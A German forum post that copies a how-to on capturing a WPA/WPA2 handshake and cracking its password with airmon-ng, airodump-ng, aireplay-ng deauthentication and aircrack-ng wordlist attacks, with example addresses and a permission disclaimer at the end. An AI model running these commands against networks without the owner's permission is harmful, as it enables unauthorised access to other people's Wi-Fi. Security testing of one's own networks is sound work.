Da Torsten Feld zum WD-Forum und zur Aircrack-Seite gelinkt hat bin ich mir sicher er hat nichts dagegen wenn ich sein HowTo hier reinkopiere. Den Link zu Seiner Seite findet Ihr weiter unten...
Die auf dieser Seite beschriebene Anleitung ist ein gemeinschaftliches Projekt freiwilliger Mitarbeiter nach dem Wiki-Prinzip.
Trotz ständiger Qualitätssicherung ist ein Schaden an deiner Hard- und Software nicht ausgeschlossen, wir übernehmen hierfür keine Haftung.
Im Gegensatz zu WEP hat WPA / WPA2 selbst keine 'Schwachstelle'. Zwar kann beim Herstellen einer Clientverbindung der Authentifizierungs-Handshake mitgelesen und aufgezeichnet werden, jedoch bringt dieser dem Angreifer herzlich wenig, wenn ein vernünftiges Passwort verwendet wird. Der Angriff auf diesen Handshake und das darin enthaltene Passwort kann bisher nur mittels Wortlisten-Attacken und Bruteforce erfolgen. Bei einem starken Passwort kann dies mehrere Jahre oder sogar Jahrzehnte dauern.
Ein Tipp noch vorweg:
Am bequemsten ist es, wenn man die benötigten Informationen wie 'BSSID', 'ESSID', 'Client-MAC', etc. in Variablen speichert. So kann man schnell und einfach auf die Inhalte zugreifen, ohne diese jedes mal neu tippen oder per Copy&Paste einfügen zu müssen.
Informationen (die gleichen wie beim WEP-Crack)
* BSSID des AP: 00:12:BF:46:68:BD
* ESSID des AP: N3ur0m4nc3r
* Kanal des AP: 01
* MAC des WLAN-Adapters: 00:C0:CA:19:FF:86
WLAN-Adapter muss Packetinjection und Monitor Mode unterstützen.
Als Betriebssytem habe ich Backtrack 3 verwendet, welches ich unter VMware installiert habe.
Starten des benötigten Interface (in diesem Falle wlan0)
ifconfig wlan0 up
Aktivieren des Monitor-Modus für den Kanal 1 (auf welchem unser AP arbeitet)
airmon-ng start wlan0 1
Nun wird airodump-ng mit den entsprechenden Parametern gestartet:
* -c 1 für Kanal 1
* -w Dateiname für die zu speichernde Datei
* --bssid Mac-Adresse des APs
* wlan0 das Interface
airodump-ng -c 1 -w neuro-wpa2 --bssid 00:12:BF:46:68:BD wlan0
Damit wir auch einen Handshake mitlesen können, muss sich ein Client anmelden während der Datenverkehr von airodump-ng aufgezeichnet wird. Um sämtliche Clients, welche zur Zeit mit dem AP verbunden sind zu trennen (und sie so zum Wiederverbinden zu animieren) kann mit aireplay-ng ein DeAuth erzwungen werden.
* -0 4 --> es werden 4 DeAuth-Pakete versandt
* -a --> Mac-Adresse des AP
* -c --> Mac-Adresse des Client
Sobald der Handshake aufgezeichnet wurde, kann aircrack-ng auf das Passwort angesetzt werden. Dieses kann, wie schon oben geschrieben, mittels Passwortliste oder Bruteforce-Angriff erfolgen.
* -a 2 --> Angriff auf WPA / WPA2
* -b --> Mac-Adresse des AP
* -e --> essid des AP
* -w --> Pfad bzw. Dateiname der Wortlisten (können auch mehrere sein)
aircrack-ng -a 2 -b 00:12:BF:46:68:BD -e N3ur0m4nc3r -w <passwordfile> *.cap
Ich möchte jedoch nochmal darauf hin weisen, dass man in fremden Netzwerk nichts zu suchen hat, sofern man nicht die Erlaubnis vom Eigentümer erhalten hat.
Am besten testet man dies alles nur in seinem privaten Netzwerk.
Quelle: feldstudie.net/2008/04/03/tuto…-gesichertes-wlan-hacken/
Dieser Beitrag wurde bereits 5 mal editiert, zuletzt von xlemmingx ()